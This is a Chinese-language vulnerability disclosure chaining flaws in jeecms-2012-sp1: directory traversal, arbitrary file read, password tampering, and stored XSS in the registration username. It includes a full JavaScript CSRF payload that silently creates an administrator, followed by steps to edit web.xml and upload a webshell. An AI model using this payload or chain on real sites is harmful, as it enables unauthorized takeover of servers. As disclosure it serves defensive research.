Jeecms变形记:xss变种到csrf再变种webshell(jeecms漏洞集

今晚花了4个小时去研究了一下jeecms,来看看一个xss如何变种webshell的 测试版本：jeecms-2012-sp1 官网:http://HdhCmsTestjeecms测试数据

jeecms这个基于java开发的cms系统无比强大，现在已开源，有很多政府，学校，商业机构在使用，危害还是相当的大

白帽子们，拿出你们的末日day，放出来吧 详细说明： 我们直接进入主题

1.跨目录，跨权限，跨妹子 到jeecms官网演示站后台，瞧一瞧，目测到跨目录问题 直接浏览服务器根目录

 

由于家里网速较卡，而且官网演示站，很多功能被限制，我下载到本地搭建环境测试，继续

任意文件下载

 

任意文件读取

 

2.这个我也不知道咋回事，我真的不知道，怎么可以修改别人的密码 创建一个res管理员

只能查看管理自己这个账号

拦截数据库包修改

 

 

发包，尼玛世界末日来了，我看见admin那妹子的账号了

 

昨天约妹子，和我吃个饭，不刁我的，看我改你密码，嘿嘿

 

登录一下妹子的账号admin

   

哈哈，成功进入，这下妹子，肯定要主动请我吃饭了，嘎嘎

好吧，我又在yy了，屌丝伤不起，活跃下气氛

go on........

3.我在思考

我在思考，这些东西的利用条件都要知道后台管理账号密码，利用还是比较困难 于是我想利用前段的留言评论，看能不能xss或者csrf 最后测试了一下，都过滤了，我伤心了

4.奇迹出现，大战即将开始

到前台看了下，到前台，必看注册

我还是在想xss妹子，最近找她太多，她烦我了，今天碰碰运气，看她理我不

这回我才xss妹子藏在注册用户名上

 

果断burpsuite拦截数据，将xss妹子请出来

 

奇迹，这次xss妹子，出来见我了

xss妹子，还在后台分身和admin妹子开玩笑

   

xss妹子说躲在后面给我把admin妹子骗过来，我太兴奋了，看了一下长度100 嘎嘎，天助我泡妹子耶

 

xss妹子说,光她一个人拿不下admin妹子，叫我喊csrf妹子来帮忙

但是csrf妹子说了叫我摸清后面添加管理员或者，修改管理妹子的基本参数和提交方法(get,post）

于是我去摸摸底 找到了，添加管理的，基本参数，请求方法

 

于是为了进去后台拿下管理妹子，我写了一个javascript post提交，添加管理

<script type="text/javascript">  var xmlHttp=null;  function createXMLHttpRequest(){  if(window.XMLHttpRequest){   xmlHttp=new XMLHttpRequest();  }  else{   try{     xmlHttp=new ActiveXObject("Msxml2.XMLHTTP");         }catch(ex){         xmlHttp=new ActiveXObject("Microsoft.XMLHTTP");    }    }  }    function sendRequest(){   //1.创建请求   if(xmlHttp==null)   {       createXMLHttpRequest();   }   var data=" username=csrf&email=csrf@shack2.org&password=csrf&groupId=1&rank=5&realname=&gender=&selfAdmin=false&viewonlyAdmin=false&roleIds=1&siteIds=1&steps=1&allChannels=true ";   xmlHttp.open("post","/jeeadmin/jeecms/admin_global/o_save.do",true);   //3.发送请求   xmlHttp.setRequestHeader("Context-Type","application/x-www-form-urlencoded");   xmlHttp.send(data);    } </script>

哎，好久没写javascript，有点生疏了

写好，上传到了我的博客，待会调用

这里我就忽悠管理妹子，说我的密码忘了，还怎么怎么的，让他看会员管理，只要看了，就中招

 

成功打入妹子内部

 

5.拿到妹子整个系统控制权（webshell）

前面我们已经知道后台有任意文件下载，任意文件读取

其实这里还有任意文件上传，任意文件修改

由于有人作怪，把所有jsp请求全拦截了

所以我们要修改她的大脑web.xml

这里以前也有基友发过

WooYun: JEECMS后台任意文件编辑 漏洞 and官方漏洞及拿shell

开始利用模版管理跨目录，修改web.xml

 

去掉对 jsp 的过滤器

 

再就是突破文件上传

这里模版功能很强大，上传jsp文件html后缀，然后改名成jsp后缀

利用跨目录，上传菜刀马儿到根目录

 

菜刀连接我的妹子

  ok，终于控制到了我的妹子了

哎，重8点熬到现在，1点，5个小时

修复方案： jeecms开源精神很好，希望再接再厉做好 网站安全 建议在目录控制过滤掉不让非跨目录读取 跨站xss没有过滤好，用户名这个这个地方，先别说跨后台管理妹子，跨其他用户也很爽额

查看更多关于Jeecms变形记:xss变种到csrf再变种webshell(jeecms漏洞集的详细内容...